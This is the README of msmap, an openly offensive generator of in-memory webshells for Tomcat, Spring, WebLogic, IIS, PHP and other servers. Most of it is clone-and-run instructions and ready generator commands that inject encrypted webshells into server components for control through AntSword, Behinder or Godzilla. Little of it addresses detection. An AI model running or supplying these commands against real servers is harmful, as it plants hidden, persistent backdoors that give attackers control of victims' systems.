Awesome
MSMAP
Msmap is a Memory WebShell Generator. Compatible with various Containers, Components, Encoder, WebShell / Proxy / Killer and Management Clients. 简体中文
The idea behind I, The idea behind II, The idea behind III
Function
- Dynamic Menu
- Automatic Compilation
- Generate Script
- Lite Mode
- Graphical Interface
Container
- Java
- Tomcat7
- Tomcat8
- Tomcat9
- Tomcat10
- Resin3
- Resin4
- WebSphere
- GlassFish
- WebLogic
- JBoss
- Spring*
- Jetty
- Netty
- JVM*
- .NET
- IIS
- PHP
- Python
*: SpringHandler only support for JDK8+
*: JVM Default support for Linux Tomcat 8/9, more versions can be adapted according to the advanced guide.
WebShell / Proxy / Killer
-
WebShell
- CMD / SH
- AntSword
- JSPJS
- Behinder
- Godzilla
-
No need for modularity
Proxy: Neo-reGeorg, wsproxy
Killer: java-memshell-scanner, ASP.NET-Memshell-Scanner
Decoder / Decryptor / Hasher
- Decoder
- Base64
- Hex
- Decryptor
- XOR
- RC4
- AES128
- AES256
- RSA
- Hasher
- MD5
- SHA128
- SHA256
Usage
git clone git@github.com:hosch3n/msmap.git
cd msmap
python generator.py
[Warning] MUST set a unique password, Options are case sensitive.
Advanced
Edit config/environment.py
# Auto Compile
auto_build = True
# Base64 Encode Class File
b64_class = True
# Generate Script File
generate_script = True
# Compiler Absolute Path
java_compiler_path = r"~/jdk1.6.0_04/bin/javac"
dotnet_compiler_path = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"
Edit gist/java/container/tomcat/servlet.py
// Servlet Path Pattern
private static String pattern = "*.xml";
If an encryption encoder is used in WsFilter, the password needs to be the same as the path (eg /passwd)
gist/java/container/jdk/javax.py with lib/servlet-api.jar can be replaced depending on the target container.
pip3 install pyperclip to support automatic copying to clipboard.
Example
<details> <summary>CMD / SH</summary>Command with Base64 Encoder | Inject Tomcat Valve
python generator.py Java Tomcat Valve Base64 CMD passwd
Type JSP with default Encoder | Inject Tomcat Valve
python generator.py Java Tomcat Valve RAW AntSword passwd
Type JSP with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat Listener
python generator.py Java Tomcat Listener AES128 AntSword passwd
Type JSP with rc_4_sha256 Encoder | Inject Tomcat Servlet
python generator.py Java Tomcat Servlet RC4 AntSword passwd
Type JSP with xor_md5 Encoder | AgentFiless Inject HttpServlet
python generator.py Java JDK JavaX XOR AntSword passwd
Type JSPJS with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat WsFilter
python generator.py Java Tomcat WsFilter AES128 JSPJS passwd
Type JSPJS with xor_md5 Encoder | Inject Spring Handler
python generator.py Java Spring Handler XOR JSPJS passwd
Type default_aes | Inject Tomcat Valve
python generator.py Java Tomcat Valve AES128 Behinder rebeyond
Type default_xor_base64 | Inject Spring Interceptor
python generator.py Java Spring Interceptor XOR Behinder rebeyond
Type JAVA_AES_BASE64 | Inject Tomcat Valve
python generator.py Java Tomcat Valve AES128 Godzilla superidol
Type JAVA_AES_BASE64 | AgentFiless Inject HttpServlet
python generator.py Java JDK JavaX AES128 Godzilla superidol
Type JAVA_AES_BASE64 | Inject Spring Handler
python generator.py Java Spring Handler AES128 Godzilla superidol
</details>
Reference
Behinder | wsMemShell | ysomap
<details> <summary>Extended Reading</summary>利用 intercetor 注入 spring 内存 webshell
基于全局储存的新思路 | Tomcat的一种通用回显方法研究
Java内存马:一种Tomcat全版本获取StandardContext的新方法
</details>